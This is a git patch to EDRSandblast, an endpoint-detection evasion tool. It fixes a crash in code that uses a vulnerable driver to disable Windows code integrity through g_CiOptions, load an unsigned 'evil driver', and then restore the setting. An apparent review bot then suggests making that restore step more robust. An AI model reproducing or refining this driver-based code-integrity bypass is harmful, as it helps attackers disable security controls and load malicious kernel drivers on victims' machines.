From 0a817fea93a54b427edae67a0deaa13b489d9e11 Mon Sep 17 00:00:00 2001
From: Maxime Meignan
Date: Mon, 9 Oct 2023 14:59:10 +0200
Subject: [PATCH] g_CiOptions patching: fixed a crash
---
 EDRSandblast_CLI/EDRSandblast.c | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/EDRSandblast_CLI/EDRSandblast.c b/EDRSandblast_CLI/EDRSandblast.c
index 9ac6420..8a1264d 100644
--- a/EDRSandblast_CLI/EDRSandblast.c
+++ b/EDRSandblast_CLI/EDRSandblast.c
@@ -742,7 +742,7 @@ Other options:\n\
 }
 _putts_or_not(TEXT("[+] Using the vulnerable driver to disable CI...")); // debug print
 ULONG CiOptionsValue = 0;
- PULONG OldCiOptionsValue;
+ ULONG OldCiOptionsValue;
 patch_gCiOptions(g_CiOptionsAddress, CiOptionsValue, &OldCiOptionsValue);
 LPTSTR evilServiceNameIfAny = NULL;
 BOOL isEvilDriverAlreadyRunning = IsDriverServiceRunning(unsignedDriverPath, &evilServiceNameIfAny);
@@ -757,7 +757,7 @@ Other options:\n\
 _putts_or_not(TEXT("[!] An error occurred while installing the evil driver"));
 }
 _putts_or_not(TEXT("[+] Using the vulnerable driver to reset original CI status")); // debug print
- patch_gCiOptions(g_CiOptionsAddress, *OldCiOptionsValue, &OldCiOptionsValue);
+ patch_gCiOptions(g_CiOptionsAddress, OldCiOptionsValue, &OldCiOptionsValue);
 }
 }
 else {
@@ -766,7 +766,6 @@ Other options:\n\
 }
 }
 }
- // END WIP
 break;
 }
 }
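Review bot: `OldCiOptionsValue` is still declared without an initializer in the first hunk and the result of the first `patch_gCiOptions` call is discarded, so if that call does not fill the out parameter, the restore call in the second hunk writes an indeterminate value back to `g_CiOptions` instead of the original setting. The saved value should only be written back when the first call is known to have succeeded; assuming `patch_gCiOptions` reports success through its return value (its definition is not visible here), record that in a flag such as `BOOL ciSaved` and test it before the restore. The restore call also passes `&OldCiOptionsValue` as its output argument, which overwrites the saved original; a separate scratch variable, e.g. `ULONG ignoredValue;`, would keep the original value intact for logging or a second attempt. The enclosing blocks start and end outside both hunks, so whether every exit path reaches the restore cannot be confirmed from this patch.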